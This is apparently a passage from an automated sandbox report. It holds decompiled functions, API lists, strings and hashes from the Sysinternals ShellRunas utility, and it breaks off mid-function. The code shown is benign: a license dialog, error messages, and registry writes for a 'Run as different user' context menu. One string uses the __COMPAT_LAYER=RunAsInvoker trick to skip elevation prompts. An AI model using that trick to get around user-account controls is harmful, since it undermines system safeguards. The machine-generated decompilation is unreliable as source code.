LocalAlloc.KERNEL32(00000000), ref: 00403059

Strings

cmd.exe /c "start , xrefs: 004030CC
.msc, xrefs: 004030BA
cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&, xrefs: 004030A1

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Name$PathShort$AllocFileLocalModule_memset
String ID: .msc$cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&$cmd.exe /c "start
API String ID: 3786246004-2437571064
Opcode ID: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
Instruction ID: de00689b0eb6e5bdbbfd2616fea31aee9d38f1499e5edb8031d74eed1a826148
Opcode Fuzzy Hash: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
Instruction Fuzzy Hash: F4511671504301ABC320EF55CC46BAB7BE8AFD5309F04482EF549A32C1E7799648C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 164
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0040AF20(void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				signed char _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t31;
				intOrPtr* _t34;
				intOrPtr _t35;
				intOrPtr* _t37;
				void* _t41;
				void* _t43;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t61;
				void* _t67;
				void* _t71;
				void* _t74;
				intOrPtr* _t75;
				struct HINSTANCE__* _t76;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;

				_t98 = __fp0;
				_t74 = __edx;
				_v12 = E0040643A();
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if( *0x4149b8 != 0) {
					L8:
					_t29 =  *0x4149c4;
					_t61 = _v12;
					if( *0x4149c4 == _t61 ||  *0x4149c8 == _t61) {
						L20:
						_t30 =  *0x4149bc;
						if( *0x4149bc != _v12) {
							_t34 = E00406443(_t30);
							if(_t34 != 0) {
								_t35 =  *_t34();
								_v8 = _t35;
								if(_t35 != 0) {
									_t36 =  *0x4149c0;
									if( *0x4149c0 != _v12) {
										_t37 = E00406443(_t36);
										if(_t37 != 0) {
											_v8 =  *_t37(_v8);
										}
									}
								}
							}
						}
						goto L26;
					} else {
						_t77 = E00406443(_t29);
						_t75 = E00406443( *0x4149c8);
						if(_t77 == 0 || _t75 == 0) {
							goto L20;
						} else {
							_t41 =  *_t77();
							if(_t41 == 0) {
								L15:
								_t43 = E00406AA9(_t79, _t98,  &_v20);
								_pop(_t67);
								if(_t43 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00405700(0, _t67, _t74, _t75);
								}
								if(_v20 < 4) {
									_a12 = _a12 | 0x00040000;
								} else {
									_a12 = _a12 | 0x00200000;
								}
								L26:
								_t31 = E00406443( *0x4149b8);
								if(_t31 == 0) {
									L28:
									return 0;
								}
								return  *_t31(_v8, _a4, _a8, _a12);
							}
							_push( &_v24);
							_push(0xc);
							_push( &_v36);
							_push(1);
							_push(_t41);
							if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
								goto L15;
							} else {
								goto L20;
							}
						}
					}
				}
				_t76 = LoadLibraryA("USER32.DLL");
				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
					goto L28;
				} else {
					_t48 = E004063CC(_t47);
					 *_t80 = "GetActiveWindow";
					 *0x4149b8 = _t48;
					_t50 = E004063CC(GetProcAddress(??, ??));
					 *_t80 = "GetLastActivePopup";
					 *0x4149bc = _t50;
					 *0x4149c0 = E004063CC(GetProcAddress(_t76, _t76));
					_t54 = E00406A72(_t79, __fp0,  &_v16);
					_pop(_t71);
					if(_t54 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0, _t71, _t74, _t76);
						_t80 = _t80 + 0x14;
					}
					if(_v16 == 2) {
						_t56 = E004063CC(GetProcAddress(_t76, "GetUserObjectInformationA"));
						 *0x4149c8 = _t56;
						if(_t56 != 0) {
							 *0x4149c4 = E004063CC(GetProcAddress(_t76, "GetProcessWindowStation"));
						}
					}
					goto L8;
				}
			}

0x0040af20
0x0040af20
0x0040af36
0x0040af39
0x0040af3c
0x0040af3f
0x0040af42
0x0040aff6
0x0040aff6
0x0040affb
0x0040b000
0x0040b07b
0x0040b07b
0x0040b083
0x0040b086
0x0040b08e
0x0040b090
0x0040b094
0x0040b097
0x0040b099
0x0040b0a1
0x0040b0a4
0x0040b0ac
0x0040b0b3
0x0040b0b3
0x0040b0ac
0x0040b0a1
0x0040b097
0x0040b08e
0x00000000
0x0040b00a
0x0040b016
0x0040b021
0x0040b023
0x00000000
0x0040b029
0x0040b029
0x0040b02d
0x0040b048
0x0040b04c
0x0040b053
0x0040b054
0x0040b056
0x0040b057
0x0040b058
0x0040b059
0x0040b05a
0x0040b05b
0x0040b060
0x0040b067
0x0040b072
0x0040b069
0x0040b069
0x0040b069
0x0040b0b6
0x0040b0bc
0x0040b0c4
0x0040b0d6
0x00000000
0x0040b0d6
0x00000000
0x0040b0d2
0x0040b032
0x0040b033
0x0040b038
0x0040b039
0x0040b03b
0x0040b040
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b040
0x0040b023
0x0040b000
0x0040af53
0x0040af57
0x00000000
0x0040af73
0x0040af74
0x0040af79
0x0040af81
0x0040af89
0x0040af8e
0x0040af96
0x0040afa3
0x0040afac
0x0040afb4
0x0040afb5
0x0040afb7
0x0040afb8
0x0040afb9
0x0040afba
0x0040afbb
0x0040afbc
0x0040afc1
0x0040afc1
0x0040afc8
0x0040afd3
0x0040afdb
0x0040afe0
0x0040aff1
0x0040aff1
0x0040afe0
0x00000000
0x0040afc8

APIs

LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 0040AF4D
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040AF69

Part of subcall function 004063CC: TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
Part of subcall function 004063CC: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0

GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF86

Part of subcall function 004063CC: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
Part of subcall function 004063CC: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420

GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF9B
__invoke_watson.LIBCMT ref: 0040AFBC

Part of subcall function 00405700: _memset.LIBCMT ref: 0040578C
Part of subcall function 00405700: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004057AA
Part of subcall function 00405700: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004057B4
Part of subcall function 00405700: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004057BE
Part of subcall function 00405700: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004057D9
Part of subcall function 00405700: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 004057E0

Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467

Part of subcall function 00406443: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
Part of subcall function 00406443: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497

GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0040AFD0
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040AFE8
__invoke_watson.LIBCMT ref: 0040B05B

Strings

MessageBoxA, xrefs: 0040AF63
GetUserObjectInformationA, xrefs: 0040AFCA
GetActiveWindow, xrefs: 0040AF79
GetLastActivePopup, xrefs: 0040AF8E
USER32.DLL, xrefs: 0040AF48
GetProcessWindowStation, xrefs: 0040AFE2

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 2940365033-232180764
Opcode ID: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
Instruction ID: 1c028cbe132dd73ef92918e8f78929fa75bbb1dd901022f9e38424cc5d2cf97e
Opcode Fuzzy Hash: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
Instruction Fuzzy Hash: E94164B1D05205AACF20AFB59C85D6FBBA8EE44314F11493FE811F22D1DB3D89548B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401310 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401310(WCHAR* __edx, void* __ebp, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				signed int _v4;
				short _v524;
				intOrPtr _v528;
				int _v532;
				void* _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t18;
				struct HBRUSH__* _t29;
				void* _t31;
				void* _t33;
				void* _t35;
				struct HWND__* _t48;
				signed int _t52;

				_t46 = __edx;
				_t52 =  &_v540;
				_t15 =  *0x413004; // 0xf284055d
				_v4 = _t15 ^ _t52;
				_t18 = _a8 - 0x110;
				_t42 = _a16;
				_t48 = _a4;
				if(_t18 == 0) {
					_push(__ebp);
					_t47 = E00401220();
					_v540 = _t47;
					_v536 =  &_v540;
					_v532 = 0;
					_v528 = E004012C0;
					E00403227(_t48,  &_v524, L"%s License Agreement", _t42);
					_t46 =  &_v524;
					SetWindowTextW(_t48,  &_v524);
					_t42 = GetDlgItem;
					SendMessageW(GetDlgItem(_t48, 0x1f4), 0x435, 0, 0x100000);
					SendMessageW(GetDlgItem(_t48, 0x1f4), 0x449, 2,  &_v536);
					_push(_t47);
					E00403199(GetDlgItem,  &_v524,  &_v524, _t47, _t48, __eflags);
					_t52 = _t52 + 0x10;
					goto L13;
				} else {
					_t31 = _t18 - 1;
					if(_t31 == 0) {
						_t33 = (_a12 & 0x0000ffff) - 1;
						__eflags = _t33;
						if(_t33 == 0) {
							EndDialog(_t48, 1);
							goto L13;
						} else {
							_t35 = _t33 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								EndDialog(_t48, 0);
								goto L13;
							} else {
								__eflags = _t35 - 0x1f3;
								if(__eflags == 0) {
									_t47 = GetDlgItem(_t48, 0x1f4);
									E00401000(_t38, __eflags);
									L13:
									_t29 = 1;
								} else {
									goto L8;
								}
							}
						}
					} else {
						if(_t31 != 0x27 || _t42 != GetDlgItem(_t48, 0x1f4)) {
							L8:
							_t29 = 0;
						} else {
							_t29 = GetSysColorBrush(5);
						}
					}
				}
				return E0040318A(_t29, _t42, _v4 ^ _t52, _t46, _t47, _t48);
			}

0x00401310
0x00401310
0x00401316
0x0040131d
0x0040132b
0x00401331
0x00401339
0x00401341
0x004013be
0x004013c5
0x004013d5
0x004013d9
0x004013dd
0x004013e5
0x004013ed
0x004013f5
0x004013fb
0x00401401
0x00401422
0x00401439
0x0040143b
0x0040143c
0x00401441
0x00000000
0x00401343
0x00401343
0x00401346
0x00401372
0x00401372
0x00401375
0x004013b3
0x00000000
0x00401377
0x00401377
0x00401377
0x0040137a
0x004013a5
0x00000000
0x0040137c
0x0040137c
0x00401381
0x00401396
0x00401398
0x00401445
0x00401445
0x00000000
0x00000000
0x00000000
0x00401381
0x0040137a
0x00401348
0x0040134b
0x00401383
0x00401383
0x0040135d
0x0040135f
0x0040135f
0x0040134b
0x00401346
0x00401461

APIs

GetDlgItem.USER32 ref: 00401353
GetSysColorBrush.USER32(00000005), ref: 0040135F
GetDlgItem.USER32 ref: 00401390
EndDialog.USER32(?,00000000), ref: 004013A5
__swprintf.LIBCMT ref: 004013ED
SetWindowTextW.USER32(?,?), ref: 004013FB
GetDlgItem.USER32 ref: 00401419
SendMessageW.USER32(00000000), ref: 00401422
GetDlgItem.USER32 ref: 00401436
SendMessageW.USER32(00000000), ref: 00401439

Strings

%s License Agreement, xrefs: 004013CF

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Item$MessageSend$BrushColorDialogTextWindow__swprintf
String ID: %s License Agreement
API String ID: 2951897483-1285993597
Opcode ID: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
Instruction ID: 1530dd87393cf7f224303f11dcabdbff35385f3a88108dc3a53a8d27bff466c6
Opcode Fuzzy Hash: b222d6317158b18de7cdf78b0e5675ac59ac6db589ad6d1fb58f5eea72f61197
Instruction Fuzzy Hash: D031F6715843016BD310AFA89D49FAF76D8AB8C708F10493EF645B62E0DB7CDA05866F

Uniqueness

Uniqueness Score: -1.00%

Function 00401BA0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401BA0(void* __eax, void* __esi, void* __eflags, char _a4) {
				void* __ebx;
				struct HWND__* _t9;
				struct HWND__* _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				_t17 = __esi;
				_t12 = __eax;
				_t16 = E004019F0(__eax, L".exe", L"Software\\Classes\\SystemFileAssociations");
				_t21 = _t20 + 4;
				if(_t16 != 0) {
					L5:
					if(_a4 != 0) {
						_push(_t17);
						E00401880(L"Error registering context menu hander", _t16);
						_t21 = _t21 + 4;
					}
					E00401930(0);
					return _t16;
				}
				_t16 = E004019F0(_t12, L"lnkfile", L"Software\\Classes");
				_t21 = _t21 + 4;
				if(_t16 != 0) {
					goto L5;
				}
				_t9 = E004019F0(_t12, L".msc", L"Software\\Classes\\SystemFileAssociations");
				_t16 = _t9;
				_t21 = _t21 + 4;
				if(_t16 != 0) {
					goto L5;
				}
				if(_a4 == _t9) {
					return _t9;
				} else {
					MessageBoxW(_t9, L"ShellRunas context menu handler successfully registered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
					return _t16;
				}
			}

0x00401ba0
0x00401ba2
0x00401bb3
0x00401bb5
0x00401bba
0x00401c0a
0x00401c0f
0x00401c11
0x00401c18
0x00401c1d
0x00401c20
0x00401c23
0x00000000
0x00401c2b
0x00401bcb
0x00401bcd
0x00401bd2
0x00000000
0x00000000
0x00401bde
0x00401be3
0x00401be5
0x00401bea
0x00000000
0x00000000
0x00401bf0
0x00401c2f
0x00401bf2
0x00401bff
0x00401c09
0x00401c09

APIs

Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
Part of subcall function 004019F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0

Part of subcall function 004019F0: _swprintf.LIBCMT ref: 00401B1A
Part of subcall function 004019F0: RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B61
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B68
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B6F
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B76
Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B7D

MessageBoxW.USER32(00000000,ShellRunas context menu handler successfully registered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 00401BFF

Strings

.msc, xrefs: 00401BD9
.exe, xrefs: 00401BA9
Error registering context menu hander, xrefs: 00401C13
ShellRunas context menu handler successfully registered., xrefs: 00401BF9
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00401BF4
Software\Classes, xrefs: 00401BBC
Software\Classes\SystemFileAssociations, xrefs: 00401BA4, 00401BD4
lnkfile, xrefs: 00401BC1

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: CloseCreate$FileMessageModuleNameValue_swprintf
String ID: .exe$.msc$Error registering context menu hander$ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler successfully registered.$Software\Classes$Software\Classes\SystemFileAssociations$lnkfile
API String ID: 23047349-2855299177
Opcode ID: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
Instruction ID: d48563127560b7a8e7189787d004048206fac3746307ea1a651a0f4517783a92
Opcode Fuzzy Hash: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
Instruction Fuzzy Hash: F8F0A7B5AC430422F3112296290279B114587D17B5F1C407BFE55773F3D97CC885826E

Uniqueness

Uniqueness Score: -1.00%

Function 00401880 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401880(void* __esi, long _a4) {
				signed int _v4;
				short _v516;
				short _v520;
				signed int _t8;
				long _t10;
				void* _t19;
				void* _t26;
				signed int _t28;
				signed int _t29;

				_t27 = __esi;
				_t28 =  &_v520;
				_t8 =  *0x413004; // 0xf284055d
				_v4 = _t8 ^ _t28;
				_t10 = _a4;
				if(_t10 == 0) {
					E004032BD( &_v516, 0x100, L"%s.", __esi);
					_t29 = _t28 + 0x10;
				} else {
					FormatMessageW(0x1100, 0, _t10, 0x400,  &_v520, 0, 0);
					_push(_v520);
					E004032BD( &_v516, 0x100, L"%s:\n%s", __esi);
					_t29 = _t28 + 0x14;
				}
				MessageBoxW(0,  &_v516, L"ShellRunas - Sysinternals: www.sysinternals.com", 0x10);
				return E0040318A(LocalFree(_v520), _t19, _v4 ^ _t29,  &_v516, _t26, _t27);
			}

0x00401880
0x00401880
0x00401886
0x0040188d
0x00401894
0x0040189d
0x004018e9
0x004018ee
0x0040189f
0x004018b5
0x004018be
0x004018cf
0x004018d4
0x004018d4
0x004018ff
0x00401923

APIs

FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 004018B5
_swprintf.LIBCMT ref: 004018CF

Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0

_swprintf.LIBCMT ref: 004018E9
MessageBoxW.USER32(00000000,?,ShellRunas - Sysinternals: www.sysinternals.com,00000010), ref: 004018FF
LocalFree.KERNEL32(00000000), ref: 00401909

Strings

Error launching application, xrefs: 004018BF, 004018D9
%s:%s, xrefs: 004018C0
%s., xrefs: 004018DA
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004018F3

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Message_swprintf$FormatFreeLocal__vswprintf_s_l
String ID: %s.$%s:%s$Error launching application$ShellRunas - Sysinternals: www.sysinternals.com
API String ID: 1614748391-2411704194
Opcode ID: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
Instruction ID: d7ba5e9dad247dd55833599d546a55f01d268ccc4582619336c1b705aef3043d
Opcode Fuzzy Hash: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
Instruction Fuzzy Hash: 090188B06443007BE220EB50CC4BFEB7BA8AF5CB51F50892DB659A61C1DBF4A544C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00406529 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 49
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E00406529(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct HINSTANCE__* _t21;
				intOrPtr _t25;
				intOrPtr _t29;
				void* _t34;
				void* _t36;
				void* _t37;
				intOrPtr _t42;
				void* _t43;

				_t37 = __edx;
				_t34 = __ecx;
				_t33 = __ebx;
				_push(0xc);
				_push(0x411a98);
				E00404A88(__ebx, __edi, __esi);
				_t21 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t43 - 0x1c) = _t21;
				_t42 =  *((intOrPtr*)(_t43 + 8));
				 *((intOrPtr*)(_t42 + 0x5c)) = 0x413990;
				 *((intOrPtr*)(_t42 + 0x14)) = 1;
				_t45 = _t21;
				if(_t21 != 0 && E00406360(_t45, __fp0) != 0) {
					_t33 = GetProcAddress;
					 *((intOrPtr*)(_t42 + 0x1f8)) = GetProcAddress( *(_t43 - 0x1c), "EncodePointer");
					 *((intOrPtr*)(_t42 + 0x1fc)) = GetProcAddress( *(_t43 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t42 + 0x70)) = 1;
				 *((char*)(_t42 + 0xc8)) = 0x43;
				 *((char*)(_t42 + 0x14b)) = 0x43;
				 *(_t42 + 0x68) = 0x4132a8;
				InterlockedIncrement(0x4132a8);
				_push(0xc);
				E00403F58(_t33, _t34, _t37, 1, _t42);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t43 + 0xc));
				 *((intOrPtr*)(_t42 + 0x6c)) = _t25;
				if(_t25 == 0) {
					_t29 =  *0x4138b0; // 0x4137d8
					 *((intOrPtr*)(_t42 + 0x6c)) = _t29;
				}
				_push( *((intOrPtr*)(_t42 + 0x6c)));
				E0040619A();
				_pop(_t36);
				 *(_t43 - 4) = 0xfffffffe;
				return E00404ACD(E004065DF(_t36));
			}

0x00406529
0x00406529
0x00406529
0x00406529
0x0040652b
0x00406530
0x0040653a
0x00406540
0x00406543
0x00406546
0x00406550
0x00406553
0x00406555
0x00406568
0x00406570
0x00406580
0x00406580
0x00406586
0x00406589
0x00406590
0x0040659c
0x004065a0
0x004065a6
0x004065a8
0x004065ae
0x004065b2
0x004065b5
0x004065ba
0x004065bc
0x004065c1
0x004065c1
0x004065c4
0x004065c7
0x004065cc
0x004065cd
0x004065de

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
___addlocaleref.LIBCMT ref: 004065C7

Strings

DecodePointer, xrefs: 00406576
KERNEL32.DLL, xrefs: 00406535
EncodePointer, xrefs: 00406560

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1389861978-2843748187
Opcode ID: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
Instruction ID: 24d076e0758c3fb3c9b827cd62f2c980b6cafb2106825d784225c4fa2649cf60
Opcode Fuzzy Hash: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
Instruction Fuzzy Hash: 12116DB1940705AED720AFB69905B5ABBE0AF00314F10853EE99AB62D0DB78A9448F1D

Uniqueness

Uniqueness Score: -1.00%

Function 00407844 Relevance: 13.7, APIs: 9, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00407844(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t61;
				void* _t64;
				long _t68;
				signed int _t71;
				signed int _t72;
				int* _t74;
				signed int* _t77;
				signed char _t79;
				long _t86;
				signed int _t88;
				int* _t89;
				signed int _t92;
				void* _t98;
				signed int** _t101;
				signed int _t102;
				void* _t106;
				int _t107;
				int _t109;
				void** _t112;
				signed int _t114;
				void** _t118;
				void* _t119;
				void* _t140;

				_t140 = __fp0;
				_t102 = __edx;
				_push(0x54);
				_push(0x411b00);
				E00404A88(__ebx, __edi, __esi);
				 *(_t119 - 4) = 0;
				GetStartupInfoA(_t119 - 0x64);
				 *(_t119 - 4) = 0xfffffffe;
				_push(0x38);
				_t109 = 0x20;
				_push(_t109);
				_t61 = E00407C87();
				if(_t61 == 0) {
					L45:
					_t62 = _t61 | 0xffffffff;
					__eflags = _t61 | 0xffffffff;
					L46:
					return E00404ACD(_t62);
				}
				 *0x415ae0 = _t61;
				 *0x415ac8 = _t109;
				_t4 = _t61 + 0x700; // 0x700
				_t92 = _t4;
				while(_t61 < _t92) {
					 *((char*)(_t61 + 4)) = 0;
					 *_t61 =  *_t61 | 0xffffffff;
					 *((char*)(_t61 + 5)) = 0xa;
					 *((intOrPtr*)(_t61 + 8)) = 0;
					 *((char*)(_t61 + 0x24)) = 0;
					 *((char*)(_t61 + 0x25)) = 0xa;
					 *((char*)(_t61 + 0x26)) = 0xa;
					_t61 = _t61 + 0x38;
					_t92 =  *0x415ae0 + 0x700;
					__eflags = _t92;
				}
				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
					L26:
					_t88 = 0;
					do {
						_t112 = _t88 * 0x38 +  *0x415ae0;
						_t64 =  *_t112;
						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
							_t112[1] = 0x81;
							__eflags = _t88;
							if(_t88 != 0) {
								asm("sbb eax, eax");
								_t68 =  ~(_t88 - 1) + 0xfffffff5;
								__eflags = _t68;
							} else {
								_t68 = 0xfffffff6;
							}
							_t106 = GetStdHandle(_t68);
							__eflags = _t106 - 0xffffffff;
							if(_t106 == 0xffffffff) {
								L42:
								_t57 =  &(_t112[1]);
								 *_t57 = _t112[1] | 0x00000040;
								__eflags =  *_t57;
								 *_t112 = 0xfffffffe;
								goto L43;
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									goto L42;
								}
								_t71 = GetFileType(_t106);
								__eflags = _t71;
								if(_t71 == 0) {
									goto L42;
								}
								 *_t112 = _t106;
								_t72 = _t71 & 0x000000ff;
								__eflags = _t72 - 2;
								if(__eflags != 0) {
									__eflags = _t72 - 3;
									if(__eflags == 0) {
										_t52 =  &(_t112[1]);
										 *_t52 = _t112[1] | 0x00000008;
										__eflags =  *_t52;
									}
								} else {
									_t112[1] = _t112[1] | 0x00000040;
								}
								_push(0xfa0);
								_t54 =  &(_t112[3]); // -4283092
								_t61 = E00407B82(_t88, _t102, _t106, _t112, __eflags, _t140);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L45;
								} else {
									_t112[2] = _t112[2] + 1;
									goto L43;
								}
							}
						} else {
							_t112[1] = _t112[1] | 0x00000080;
						}
						L43:
						_t88 = _t88 + 1;
					} while (_t88 < 3);
					SetHandleCount( *0x415ac8);
					_t62 = 0;
					goto L46;
				}
				_t74 =  *(_t119 - 0x30);
				if(_t74 == 0) {
					goto L26;
				}
				_t107 =  *_t74;
				_t89 =  &(_t74[1]);
				 *(_t119 - 0x1c) = _t89 + _t107;
				if(_t107 >= 0x800) {
					_t107 = 0x800;
				}
				_t114 = 1;
				while( *0x415ac8 < _t107) {
					_t77 = E00407C87(0x20, 0x38);
					__eflags = _t77;
					if(__eflags == 0) {
						_t107 =  *0x415ac8;
						L17:
						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
						if(_t107 <= 0) {
							goto L26;
						} else {
							goto L18;
						}
						do {
							L18:
							_t98 =  *( *(_t119 - 0x1c));
							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
								_t79 =  *_t89;
								if((_t79 & 0x00000001) == 0) {
									goto L25;
								}
								if((_t79 & 0x00000008) != 0) {
									L23:
